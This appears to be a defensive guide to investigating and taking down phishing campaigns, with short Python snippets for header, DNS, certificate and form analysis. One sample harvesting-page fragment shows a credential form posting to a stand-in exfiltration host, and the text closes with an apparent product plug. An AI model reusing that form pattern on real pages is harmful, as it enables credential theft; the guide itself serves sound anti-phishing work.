
A new phishing email lands in a shared abuse mailbox. The subject line mimics an invoice notification from a well-known logistics company. The HTML body is a pixel-perfect copy of the real brand's template, complete with tracking numbers and a "View Shipment" button that points to a domain registered forty-eight hours ago. Somewhere behind that domain sits a credential-harvesting page, probably backed by a phishing kit sold on a Telegram channel for thirty dollars. The researcher's job is to trace the infrastructure, document the campaign, and get it taken down before the victim count climbs.

The job sounds straightforward. It is not. Phishing operators are aware they're being hunted. Modern kits include anti-researcher features: IP-based geofencing that blocks requests from known VPN ranges, browser fingerprinting that detects automated tools, and honeypot detection pages that serve benign content to anyone who doesn't arrive through the phishing link's exact referrer chain. Investigating safely and effectively requires operational discipline, disposable infrastructure, and identity data that doesn't trace back to the researcher.

Why Real Identity Data Has No Place in Phishing Research

The first instinct when investigating a credential-harvesting page is to submit something and see what happens. Does the page validate input? Does it redirect to the real site after submission? Does it send the harvested data to a Telegram bot, an email address, or a remote server?

Submitting real credentials is obviously out of the question. Submitting the researcher's real name and email is nearly as bad. If the phishing operator reviews their logs (and the sophisticated ones do), a submission from a security researcher's known email address signals that the campaign is under investigation. The operator may burn the infrastructure immediately, take the domain offline, and spin up a replacement before the takedown process completes. The researcher loses visibility into the campaign's infrastructure at the worst possible moment.

Submitting obviously fake data ("test@test.com", "John Doe", "123 Fake Street") is marginally better but still problematic. Some kits validate email format against known disposable domains. Others check whether the submitted name and address are internally consistent. A few run real-time checks against databases to verify that the submitted identity is plausible. Failing these checks may trigger the kit's anti-analysis defences, serving a different page or logging the researcher's IP for future blocking.

Synthetic identities solve this. A generated profile with a realistic name, a working email address format on a plausible domain, a phone number with the correct country prefix, and a billing address that matches the phone's region passes automated validation without exposing the researcher's actual identity. The phishing kit treats the submission as a regular victim. The researcher gets to observe the full post-submission flow.

Building the Investigation Environment

Before touching the phishing infrastructure, the research environment needs to be isolated from the researcher's identity and regular working environment.

A dedicated virtual machine running a clean browser installation is the baseline. The VM should not share any identifiers with the researcher's host machine: different timezone settings, different screen resolution, different installed fonts. Phishing kits that fingerprint browsers can correlate visits across sessions if the fingerprint is distinctive. A clean VM with default settings produces a generic fingerprint that blends in with regular traffic.

Network isolation comes next. The VM's traffic should route through a VPN or Tor, with the exit node in a geography that matches the phishing campaign's target audience. A phishing page targeting French bank customers will behave differently when accessed from a French IP than from a US one. Some pages won't load at all from the wrong geography. Using an exit node that matches the target locale ensures the researcher sees what a real victim would see.

DNS resolution should be logged locally. Recording every DNS query the browser makes during the investigation captures the full infrastructure chain: the phishing domain, any CDN or redirect domains, the exfiltration endpoint, and any analytics or tracking domains the kit loads. This DNS log becomes part of the evidence package for the takedown request.
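A small sketch of what that local logging can yield, assuming a dnsmasq-style query log; the log format, domains, and client IP here are illustrative, not from a real campaign:

```python
import re

# Matches dnsmasq-style query lines, e.g.:
# "Jan 12 10:31:02 dnsmasq[913]: query[A] invoice-dhl-secure.com from 10.0.0.5"
QUERY_RE = re.compile(r"query\[(?P<rtype>[A-Z]+)\] (?P<domain>\S+) from (?P<client>\S+)")

def extract_queried_domains(log_lines):
    """Return unique (record type, domain) pairs in first-seen order,
    so the infrastructure chain reads chronologically."""
    seen = []
    for line in log_lines:
        m = QUERY_RE.search(line)
        if m and (m.group("rtype"), m.group("domain")) not in seen:
            seen.append((m.group("rtype"), m.group("domain")))
    return seen

log = [
    "Jan 12 10:31:02 dnsmasq[913]: query[A] invoice-dhl-secure.com from 10.0.0.5",
    "Jan 12 10:31:02 dnsmasq[913]: query[A] cdn.invoice-dhl-secure.com from 10.0.0.5",
    "Jan 12 10:31:03 dnsmasq[913]: query[A] invoice-dhl-secure.com from 10.0.0.5",
    "Jan 12 10:31:05 dnsmasq[913]: query[A] api.telegram.org from 10.0.0.5",
]
print(extract_queried_domains(log))
```

The deduplicated, ordered list drops straight into the evidence package: phishing domain first, exfiltration endpoint last.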

Email handling requires its own isolation. If the investigation involves replying to phishing emails or using email addresses during form submission, those addresses can't be the researcher's real mailbox. A dedicated investigation mailbox, or better, a set of synthetic email addresses that forward to a monitored collection point, keeps the researcher's identity out of the phishing operator's logs while still capturing any follow-up messages the operator sends.
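One way to make those forwarded addresses attributable, sketched below: derive a unique alias per investigation from a case identifier, so any later message to that alias points straight back at the campaign that harvested it. The collection domain and salt are placeholders, and in practice the hashed local part would be paired with a plausible display name so it still passes the kit's validation.

```python
import hashlib

COLLECTION_DOMAIN = "example-collection.net"  # placeholder catch-all domain
SECRET = b"rotate-this-per-quarter"           # placeholder salt, kept out of source control

def alias_for(case_id):
    """Derive a stable, non-guessable local part per investigation case.
    A catch-all mailbox on COLLECTION_DOMAIN receives anything sent to it,
    and the hash ties any follow-up message back to the originating case."""
    digest = hashlib.sha256(SECRET + case_id.encode()).hexdigest()[:10]
    return f"m.{digest}@{COLLECTION_DOMAIN}"

def case_for(address, known_cases):
    """Reverse lookup: which investigation produced this address?"""
    return next((c for c in known_cases if alias_for(c) == address), None)
```

A follow-up phishing email landing on an alias months later then answers, in one lookup, which campaign originally collected it.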

The Investigation Workflow: Step by Step

The investigation proceeds in layers, from passive observation to controlled interaction.

Header analysis comes first. The phishing email's headers reveal the sending infrastructure: the originating IP, the mail server, the SPF/DKIM/DMARC records (or lack of them), and any relay hops. This is purely passive work. No interaction with the phishing infrastructure is needed. The headers alone sometimes reveal the hosting provider, the email service used for delivery, and whether the campaign is operating from compromised infrastructure or purpose-built servers.
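A minimal example of that passive work using Python's standard email module; the headers below are fabricated for illustration:

```python
from email import message_from_string

RAW = """\
Received: from mail.bulk-sender.example ([203.0.113.7]) by mx.victim-org.example;
 Mon, 13 Jan 2025 09:12:44 +0000
Received: from [198.51.100.23] by mail.bulk-sender.example;
 Mon, 13 Jan 2025 09:12:41 +0000
Authentication-Results: mx.victim-org.example; spf=fail; dkim=none; dmarc=fail
From: "DHL Billing" <billing@invoice-dhl-secure.com>
Subject: Your shipment invoice

(body omitted)
"""

msg = message_from_string(RAW)

# Each hop prepends its own Received header, so reversing the list gives
# the path the message actually travelled: origin first, final MX last.
hops = list(reversed(msg.get_all("Received", [])))
auth = msg.get("Authentication-Results", "")

print("Origin hop:", hops[0].split(";")[0].strip())
print("SPF failed:", "spf=fail" in auth)
```

The originating IP in the earliest hop, plus the failed SPF/DKIM/DMARC results, already says a lot about whether the sending infrastructure is purpose-built or compromised.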

WHOIS and DNS reconnaissance follow. The phishing domain's registration records (often privacy-protected, but the registrar itself is useful information), the DNS records (A records, MX records, NS records, TXT records), and the hosting provider all get documented. Historical DNS data from passive DNS databases can reveal whether the domain was recently registered (likely purpose-built for phishing) or was a legitimate domain that's been compromised. Certificate transparency logs show when the SSL certificate was issued and by which CA, which helps establish a timeline.
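The certificate timeline can be extracted programmatically. The sketch below assumes records shaped like crt.sh's JSON output (a real lookup would fetch https://crt.sh/?q=<domain>&output=json over HTTPS); the sample data is invented:

```python
import json
from datetime import datetime

# Sample records mimicking the shape of crt.sh's JSON output; values invented.
SAMPLE = json.loads("""[
  {"issuer_name": "C=US, O=Let's Encrypt, CN=R11",
   "common_name": "invoice-dhl-secure.com",
   "not_before": "2025-01-11T18:02:33"},
  {"issuer_name": "C=US, O=Let's Encrypt, CN=R11",
   "common_name": "www.invoice-dhl-secure.com",
   "not_before": "2025-01-11T18:02:33"}
]""")

def earliest_certificate(records):
    """First certificate issuance is a hard lower bound on when the site
    could have served HTTPS -- an anchor point for the campaign timeline."""
    return min(datetime.fromisoformat(r["not_before"]) for r in records)

first_seen = earliest_certificate(SAMPLE)
print("Earliest certificate:", first_seen.isoformat())
```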

Controlled page access happens next. The researcher loads the phishing page in the isolated VM, capturing the full HTTP exchange: request headers, response headers, page source, JavaScript files, images, and any external resources loaded. The page source often contains the phishing kit's fingerprint, including variable names, form field structures, and exfiltration URLs that match known kit families. Capturing everything at the moment of access matters because operators frequently modify or take down pages within hours.
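Pulling the form targets and credential field names out of the captured source is the raw material for a kit fingerprint. A sketch using the standard library's HTML parser, run against an invented page fragment:

```python
from html.parser import HTMLParser

class FormTargetExtractor(HTMLParser):
    """Collect form actions and credential field names from captured
    page source -- the structural indicators that identify a kit."""
    def __init__(self):
        super().__init__()
        self.actions = []
        self.fields = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form" and "action" in attrs:
            self.actions.append(attrs["action"])
        elif tag == "input":
            self.fields.append(attrs.get("name") or attrs.get("id"))

# Invented fragment standing in for a captured harvesting page.
PAGE = """
<form method="post" action="https://exfil.example/gate.php">
  <input type="email" name="email" placeholder="Email">
  <input type="password" name="pass" placeholder="Password">
</form>
"""

parser = FormTargetExtractor()
parser.feed(PAGE)
print(parser.actions, parser.fields)
```

The form action here is the exfiltration URL; the field names feed the fingerprint database discussed later.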

Credential submission is the step that requires synthetic identity data. A generated profile gets submitted through the form. The researcher monitors what happens next: where the submitted data is sent (Telegram bot, email, external server), whether the page redirects to the legitimate site (a common trick to reduce victim suspicion), and whether the form submission triggers any secondary actions (downloading malware, setting cookies, loading additional tracking pixels).

The synthetic identity used for submission should be documented in the investigation record. If the same identity later appears in a credential dump or is used in a subsequent attack, that linkage provides intelligence about the operator's data handling practices.
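That linkage check is mechanical once the identities are documented. A sketch, with invented case records and dump contents:

```python
def find_tripwire_hits(investigation_records, dump_emails):
    """Each record documents the synthetic identity submitted during one case.
    A hit means the operator's harvested data resurfaced -- evidence of
    reuse, sharing, or sale."""
    dump = {e.lower() for e in dump_emails}
    return [
        (rec["case_id"], rec["synthetic_email"])
        for rec in investigation_records
        if rec["synthetic_email"].lower() in dump
    ]

records = [
    {"case_id": "CASE-051", "synthetic_email": "lena.krauss@plausible-mail.example"},
    {"case_id": "CASE-052", "synthetic_email": "marc.dupont@plausible-mail.example"},
]
later_dump = ["MARC.DUPONT@plausible-mail.example", "victim1@real-isp.example"]
print(find_tripwire_hits(records, later_dump))
```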

Takedown Execution

Once the evidence package is assembled, the takedown process involves multiple parties, and the order matters.

The hosting provider gets the first report. Most reputable hosts have abuse desks that respond to phishing reports within hours. The report should include the phishing URL, screenshots of the harvesting page, the DNS records confirming the domain resolves to their infrastructure, and a brief description of the campaign. Hosting providers acting under safe harbour provisions are motivated to respond quickly once they have documented evidence.

The domain registrar gets a parallel report if the domain was registered specifically for phishing (rather than being a compromised legitimate domain). Registrars can suspend domains at the registry level, which is faster and more permanent than asking a hosting provider to remove content. The domain could be moved to a different host in minutes, but a registry suspension takes the domain offline regardless of where it's hosted.

The targeted brand should be notified, especially if they have a dedicated anti-phishing programme. Large banks, payment processors, and technology companies maintain takedown teams that can escalate with hosting providers and registrars through established relationships. Their involvement often accelerates the process.

Browser-level blocking through Google Safe Browsing and Microsoft SmartScreen provides immediate protection for end users even before the infrastructure is taken down. Submitting the URL to these services adds it to the blocklists that browsers check in real time: Chrome, Firefox, and Safari consult Safe Browsing, while Edge consults SmartScreen. A blocked URL shows a full-page warning to victims who click the phishing link, which dramatically reduces the campaign's effectiveness even if the page is still technically live.

Certificate authorities can revoke the SSL certificate, which can cause security warnings when visitors access the page. Revocation checking is inconsistent across browsers and not all CAs respond quickly, so this is a secondary measure, but it's worth including in the evidence distribution.

Tracking Repeat Offenders Across Campaigns

Phishing operators rarely run a single campaign. The same operator or group will register new domains, deploy the same kit with minor modifications, and target the same brands repeatedly. Tracking these patterns across campaigns builds a richer intelligence picture.

Kit fingerprints are the most reliable tracking indicator. The same variable names in the JavaScript, the same form field IDs, the same exfiltration method (Telegram bot token, email address, remote server URL) appear across campaigns even when the domains and hosting change. A database of kit fingerprints extracted during investigations allows researchers to link new campaigns to previously documented ones.
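A hashed fingerprint over those structural indicators makes matching cheap across campaigns. The kit family name, variable names, and field names below are invented:

```python
import hashlib

def kit_fingerprint(js_variables, form_fields, exfil_method):
    """Hash the structural indicators that survive domain and hosting changes.
    Exact endpoint values (bot tokens, URLs) are tracked separately; the
    fingerprint captures the kit's shape, not one deployment."""
    material = "|".join([
        ",".join(sorted(js_variables)),
        ",".join(sorted(form_fields)),
        exfil_method,
    ])
    return hashlib.sha256(material.encode()).hexdigest()[:16]

# Fingerprints extracted during earlier investigations (invented examples).
known = {kit_fingerprint({"sendData", "chk"}, {"email", "pass"}, "telegram"): "KitFamily-A"}

# A new campaign on a fresh domain: same variables, fields, and exfil method.
new_fp = kit_fingerprint({"chk", "sendData"}, {"pass", "email"}, "telegram")
print(known.get(new_fp, "unknown kit"))
```

Sorting the indicators before hashing keeps the fingerprint stable regardless of the order in which they were extracted from the page source.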

Registration patterns help too. An operator who registers domains through the same registrar, uses the same privacy service, follows the same naming pattern (brand-name-verify-login.com, brand-name-secure-update.net), or uses the same email address across registrations is creating a signature. These patterns become searchable. New domain registrations matching the pattern can be flagged before the phishing page even goes live.
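Turning a naming pattern into an automated flag on new-registration feeds might look like the sketch below; the pattern, brand, and domains are invented examples, not a real operator's signature:

```python
import re

# Hypothetical signature distilled from a tracked operator's registrations:
# <brand>-<keyword>-<keyword>.<tld>, drawing on a small action-word vocabulary.
PATTERN = re.compile(
    r"^(?P<brand>[a-z0-9]+)-(?:verify|secure|update|login)"
    r"-(?:verify|secure|update|login)\.(?:com|net|org)$"
)

def flag_registrations(new_domains, watched_brands):
    """Flag newly registered domains matching the operator's naming signature
    for a watched brand -- ideally before the phishing page goes live."""
    hits = []
    for domain in new_domains:
        m = PATTERN.match(domain)
        if m and m.group("brand") in watched_brands:
            hits.append(domain)
    return hits

feed = ["examplebank-verify-login.com", "news-update-login.net", "examplebank-shop.com"]
print(flag_registrations(feed, {"examplebank"}))
```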

Exfiltration infrastructure often persists across campaigns. A Telegram bot token used to receive harvested credentials in one campaign may appear in a different campaign targeting a different brand. The same email address may collect data from multiple kits. Documenting these endpoints creates a network map of the operator's infrastructure that extends beyond any single campaign.
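Inverting campaign records into an endpoint-centred map surfaces those overlaps automatically. A sketch with invented campaign data:

```python
from collections import defaultdict

def build_endpoint_map(campaigns):
    """Invert campaign records into endpoint -> campaign IDs, keeping only
    endpoints seen in more than one campaign -- a recurring bot token or
    drop address links otherwise unrelated infrastructure."""
    endpoint_map = defaultdict(set)
    for c in campaigns:
        for endpoint in c["exfil_endpoints"]:
            endpoint_map[endpoint].add(c["campaign_id"])
    return {e: ids for e, ids in endpoint_map.items() if len(ids) > 1}

campaigns = [
    {"campaign_id": "C-101", "exfil_endpoints": ["tg-bot:example-token", "drop1@mail.example"]},
    {"campaign_id": "C-118", "exfil_endpoints": ["tg-bot:example-token"]},
]
print(build_endpoint_map(campaigns))
```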

Synthetic identities submitted during investigations create passive tripwires. If a credential submitted to Campaign A appears in Campaign B's targeting list, it confirms the operator is reusing harvested data. If the synthetic email address receives phishing emails from a different campaign, it confirms the address was shared or sold. These linkages are intelligence that emerges over time, but only if the original investigation used trackable synthetic data rather than throwaway gibberish.

Post-Investigation Hygiene

After the takedown is confirmed, the investigation environment needs to be cleaned and the synthetic identities retired.

The investigation VM should be reverted to its pre-investigation snapshot or destroyed entirely. Any cookies, cached data, or browser state from the investigation could be used to correlate future investigations if the VM is reused. A clean slate for each investigation prevents this.

Synthetic identities used during the investigation should be documented and archived, but not reused in future investigations. If the operator kept logs, they may remember the identity. Reusing it in a different investigation against a different operator creates an unexpected correlation point.

Tools like Another.IO make the disposability practical. Generating a complete, internally consistent identity for each investigation costs seconds rather than hours. The identity passes form validation, doesn't trace back to the researcher, and gets retired after use. The researcher's effort goes to the investigation itself rather than to crafting believable fake personas by hand.

If the synthetic email address used during the investigation continues to receive messages after the investigation, those messages themselves become intelligence. A follow-up phishing email sent to the synthetic address confirms that the operator is recycling harvested credentials for secondary campaigns. A password-reset notification from a legitimate service sent to the synthetic address means the operator attempted to use the submitted credentials on a real platform, confirming that the kit is actively weaponising collected data rather than just stockpiling it.